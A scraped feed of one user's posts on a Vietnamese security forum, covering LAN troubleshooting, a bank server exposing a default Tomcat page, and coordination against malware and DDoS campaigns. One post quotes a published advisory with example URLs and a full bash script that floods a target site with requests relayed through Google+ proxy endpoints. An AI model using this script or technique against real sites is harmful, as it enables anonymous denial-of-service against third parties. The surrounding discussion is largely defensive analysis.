<![CDATA[Messages posted by "ga_cum06"]]> /hvaonline/posts/listByUser/167434.html JForum - http://www.jforum.net Lớp học Hacking - Scriptkiddies class /hvaonline/posts/preList/45425/279587.html#279587 /hvaonline/posts/preList/45425/279587.html#279587 GMT PHP vs JSP /hvaonline/posts/preList/8404/274331.html#274331 /hvaonline/posts/preList/8404/274331.html#274331 GMT Lỗi trên hệ thống 3D secure của ngân hàng acb https://3dsecure.acb.com.vn. default page của tomcat luôn mới sợ vài ảnh chụp được mọi người bình luận nhé. dây dưa với bọn ngân hàng mệt lắm. [url=http://upanh.com/view/?id=avsf0a5z7fl]
[/url] [url=http://upanh.com/view/?id=5vs62abz8fs]
[/url] [url=http://upanh.com/view/?id=3vs5cafz7fz]
[/url] [url=http://upanh.com/view/?id=4vsb2a3zafw]
[/url]]]>
/hvaonline/posts/preList/44436/274197.html#274197 /hvaonline/posts/preList/44436/274197.html#274197 GMT
Cần các bác giúp website em đang bị DDOS /hvaonline/posts/preList/43344/271488.html#271488 /hvaonline/posts/preList/43344/271488.html#271488 GMT Cần các bác giúp website em đang bị DDOS /hvaonline/posts/preList/43344/271483.html#271483 /hvaonline/posts/preList/43344/271483.html#271483 GMT Bảo mật *nix Cần học những gì ( Câu hỏi hay hỏi trong khi tuyển dụng) /hvaonline/posts/preList/43498/269830.html#269830 /hvaonline/posts/preList/43498/269830.html#269830 GMT Backdoor "trốn" trong phần mềm PhpMyadmin trong SourceForge /hvaonline/posts/preList/43500/269829.html#269829 /hvaonline/posts/preList/43500/269829.html#269829 GMT Phương án giải quyết khi bị ISP chặn website một cách vô lí /hvaonline/posts/preList/43479/269818.html#269818 /hvaonline/posts/preList/43479/269818.html#269818 GMT Tại sao bài viết của mình bị mất mà không có lí do gì /hvaonline/posts/preList/43326/269055.html#269055 /hvaonline/posts/preList/43326/269055.html#269055 GMT Tại sao bài viết của mình bị mất mà không có lí do gì /hvaonline/posts/preList/43326/269053.html#269053 /hvaonline/posts/preList/43326/269053.html#269053 GMT ĐH Mỹ sẽ mở lớp học trên mạng miễn phí /hvaonline/posts/preList/43180/268437.html#268437 /hvaonline/posts/preList/43180/268437.html#268437 GMT Không hiển thị IP tĩnh trên local ?

PXMMRF wrote:
"không hiểu vì lý do gì mà không còn hiện IP nữa, báo lỗi disconnect" Lý do là vì Router hay modem đã cấp đia chỉ IP riêng (prvate IP ) này (192.168.1.15) cho một máy khác trong mang LAN. Điều này thường xảy ra khi máy bạn và một số máy khác trong LAN cùng khởi đông lai và một số máy hoàn tất quá trình khởi động nhanh hơn máy của bạn. Bạn phải áp dụng kỹ thuật "Bind Private IP (của máy) với Computername hay MAC Address (của máy-tức là của card mạng)" trong cấu hình của Router hay modem. Như vậy máy của bạn luôn có Private IP đã đươc Binded.  
nếu như bạn đó đã config ip mà modem or Router đã cấp phát thì ngay sau khi đặt ip(bị trùng) đó, window sẽ báo lỗi ngay chứ bác. tình trạng hiện thời của bạn có vẻ như là bạn chưa thể connect được tới modem và từ đó sẽ không có ip. bạn thử dùng 1 máy khác connect đến modem. nếu được => máy kia có vấn đề. nếu không được cắm thằng 2 máy (LAN) vào nhau nếu được thì modem có vấn đề....(nhớ dùng cái máy ngon ngon k thì loanh quanh chả biết lỗi ở đâu cả).]]>
/hvaonline/posts/preList/42957/267371.html#267371 /hvaonline/posts/preList/42957/267371.html#267371 GMT
Cấu hình VNC server/viewer trong Linux /hvaonline/posts/preList/16417/267368.html#267368 /hvaonline/posts/preList/16417/267368.html#267368 GMT HVA News - Trang tin Kenh14.vn bị deface /hvaonline/posts/preList/42933/267160.html#267160 /hvaonline/posts/preList/42933/267160.html#267160 GMT Free Java hosting /hvaonline/posts/preList/40768/252544.html#252544 /hvaonline/posts/preList/40768/252544.html#252544 GMT Make Requests Through Google Servers DDos (IHteam)! /hvaonline/posts/preList/39969/247613.html#247613 /hvaonline/posts/preList/39969/247613.html#247613 GMT Phần mềm văn phòng điện tử eOffice của BKIS bị AVs báo nhiễm Trojan /hvaonline/posts/preList/40089/247272.html#247272 /hvaonline/posts/preList/40089/247272.html#247272 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Nội quy diễn đàn HVAOnline HVAOnline là diễn đàn phi lợi nhuận, phi tôn giáo, phi chính trị. Diễn đàn được lập ra với mục đích chia sẻ, trao đổi kiến thức và kinh nghiệm. Để HVAOnline là một nơi sinh hoạt lành mạnh và bổ ích, thành viên cần lưu ý những điểm như sau:................................   mỗi khi vào đăng nhập vào diễn đàn em đều thấy cái này, có vẻ như dạo này bác TQN hơi bận RCE , ít viết thêm các phân tích chuyên môn nên topic bắt đầu có vẻ lạc đề hay sao ý nhỉ ? ]]> /hvaonline/posts/preList/39641/247271.html#247271 /hvaonline/posts/preList/39641/247271.html#247271 GMT Make Requests Through Google Servers DDos (IHteam)! /hvaonline/posts/preList/39969/246993.html#246993 /hvaonline/posts/preList/39969/246993.html#246993 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/246674.html#246674 /hvaonline/posts/preList/39641/246674.html#246674 GMT Make Requests Through Google Servers DDos (IHteam)! /hvaonline/posts/preList/39969/246433.html#246433 /hvaonline/posts/preList/39969/246433.html#246433 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/246432.html#246432 /hvaonline/posts/preList/39641/246432.html#246432 GMT Make Requests Through Google Servers DDos (IHteam)! How does it work? The vulnerable pages are “/_/sharebox/linkpreview/“ and “gadgets/proxy?“ Is possible to request any file type, and G+ will download and show all the content. So, if you parallelize so many requests, is possible to DDoS any site with Google bandwidth. Is also possible to start the attack without be logged in G+. Attack vectors: The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method); The funny thing is that apache will log Google IPs. But beware: gadgets/proxy? will send your ip in apache log, if you want to attack, you’ll need to use /_/sharebox/linkpreview/ Also the Sql injection Time attack will work using this method. DDoS attack is just an example, do not start ddos for no reason Pratical examples: https://plus.google.com/_/sharebox/linkpreview/?c=<SITE>&t=1&_reqid=<RANDOM_NUMBERS>&rt=j or https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=<SITE>&container=focus code
#!/bin/bash # Bug found by # # Simone 'R00T_ATI' Quatrini # # Mauro 'epicfail' Gasperini # # Site: http://www.ihteam.net # function start { echo "[*] Sending `echo $2` Requests..." for a in `seq $2` do id=$((RANDOM%3999999+3000000)) nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 & nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 & done echo "[*] Still attacking `echo $urlclear`" echo "[*] Sleeping for 10 Seconds" sleep 10 start url $2 urlclear } echo '' echo ' 88888888ba, 88888888ba, ad88888ba ' echo ' aa 88 `"8b 88 `"8b d8" "8b ' echo ' 88 88 `8b 88 `8b Y8, ' echo 'aaaa88aaaa 88 88 88 88 ,adPPYba, `Y8aaaaa, ' echo '""""88"""" 88 88 88 88 a8" "8a `"""""8b, ' echo ' 88 88 8P 88 8P 8b d8 `8b ' echo ' "" 88 .a8P 88 .a8P "8a, ,a8" Y8a a8P ' echo ' 88888888Y"" 88888888Y"" `"YbbdP"" "Y88888P"' echo '' if [ "$#" -lt 2 ]; then echo "Usage: $0 <big file> <Requests>" echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000" echo "" exit 0 fi case $2 in *[!0-9]* ) echo "$2 is not numeric" && exit 1;; esac echo "Attack -->" $1 match1=/ repl1=%2F match2=: repl2=%3A url=$1 urlclear=$1 url=${url//$match1/$repl1} url=${url//$match2/$repl2} echo "" echo "[*] Loop started! CTRL+C to stop" echo "" start url $2 urlclear  
Các bác có thông tin gì thêm về việc này không. từ ngày hva bị DDos đến vietnamnet cứ đi đâu nhìn thấy chữ này là mình sôi cả tiết, các anh STL có thấy thì bỏ qua nhé. Đừng thực hành làm gì :))]]>
/hvaonline/posts/preList/39969/246403.html#246403 /hvaonline/posts/preList/39969/246403.html#246403 GMT
Thư viên tool đồ sộ chuyên sử dụng RCE /hvaonline/posts/preList/39864/245702.html#245702 /hvaonline/posts/preList/39864/245702.html#245702 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/245697.html#245697 /hvaonline/posts/preList/39641/245697.html#245697 GMT Thư viên tool đồ sộ chuyên sử dụng RCE /hvaonline/posts/preList/39864/245695.html#245695 /hvaonline/posts/preList/39864/245695.html#245695 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Không cần thiết viết thêm đâu anh, chỉ cần ghi chú là bà con login hay RunAs file cmd trên với quyền Admin là được. Chạy 1 lần, press any key vài lần, sau đó login vào user thường dùng, chạy 1 lần, press any key vài lần nữa là xong. - taskkill: Kill process đang run của exe cần del. - sc delete: Delete service mà exe cần kill đăng ký - Xong xuôi, del nó đi là vừa. Em xin báo cáo với mấy anh stl, Avira vừa report về cho em, toàn bộ AcrobatUpdater.exe, SbieSvc.exe, SbieMgm.dll mà em đã up cho Avira đã được Avira báo là "mèo què". Thêm nữa, chiều nay, KIS của em tự đông nhai xương hết toàn bộ mấy file trên trong thư mục: Virus\STL trên máy em rồi. Từ từ rồi toàn bộ 100% các "mèo què" của mấy anh sẽ bị các AVs phổ biến tiêu diệt hết. Thử xem lúc đó mấy anh còn "đốt chích" được ai. PS: Bỏ cái trò comment hù doạ trên cái bờ lốc bỏ hoang của em đi nhé, mấy anh stl. Chơi vậy là hèn lắm đấy. Đấu với nhau bằng kỷ thuật không lại giờ quay ra hù doạ em à ? Hu hu, em sợ quá, mấy anh tha cho em :-( :-( :-) =))  
lại còn dám doạ nạt cả thường dân vô tội . Đúng là người làm chuyện nhớn có khác chả từ thủ đoạn nào cả, nếu như chúng nó có bộ phận đảm nhiệm việc chuyên đi doạ nạt người khác thì không nó làm gì.Còn vì bức xúc với việc bị tụt quần code mà đem lòng ghen ghét hay (sợ hãi) gì thì đúng là bọn đầu lợn :)). người đã làm thì không sợ mà nếu sợ chúng nó thì đã chả dám làm. @TQN : hôm trước em tập RCE mấy cái File jad tìm được web này có khá nhiều tool RCE http://www.woodmann.com chia sẻ mọi người cùng tham khảo Link Tham khảo các Tool : http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools]]>
/hvaonline/posts/preList/39641/245593.html#245593 /hvaonline/posts/preList/39641/245593.html#245593 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244468.html#244468 /hvaonline/posts/preList/39641/244468.html#244468 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

acoustics89 wrote:
Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi. nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác Các anh có ý kiến gì để làm việc hiệu quả hơn không 
Anh nghĩ có 3 mảng để lo: 1. RE. 2. Trace net và xác định mạng hoạt động của malware. 3. Report cho các nhóm antiviruses và các nhóm chức năng. Nếu cần làm việc hữu hiệu có lẽ cần phải tạo một group list (dùng google group chẳng hạn). Trong đó, thành viên của nhóm liên lạc qua group và chỉ nên công bố thông tin trên diễn đàn sau khi tìm ra kết quả hoặc nếu cần các thành viên trên diễn đàn đóng góp thêm thông tin, mẫu mã. 
em cũng vừa nghĩ đến vấn đề này, thà rằng tạo 1 team âm thầm làm việc và chỉ public khi công việc đến mức độ nào đó. em thấy các anh cứ làm việc rồi lại mất ngồi post lên thế này khá mất thời gian :D mà lại đánh rắn động cỏ ...nếu được em xin 1 chân ở trong group nào đó :D Ý kiến của em là nên lập 1 nhóm tuyên truyền .Hướng dẫn kĩ thuật tìm và diệt malware, cho member ở các forum khác. các phần mềm đã bị fake nên có hướng dẫn cụ thể đâu là thật đâu là giả và lấy từ nguồn nào tốt nhất,chắc chắn chúng ta không thể loại hoàn toàn được malware của STL nhưng cũng đỡ đi phần nào, để chúng nó thấy anh em hva cũng biết cách phản công chứ không chỉ ngồi phân tích cái đống code của chúng. Đã đến lúc mọi người chung tay góp sức, làm việc có kế hoạch và bài bản để đạt được kết quả cao nhất :D O-) ]]>
/hvaonline/posts/preList/39641/244330.html#244330 /hvaonline/posts/preList/39641/244330.html#244330 GMT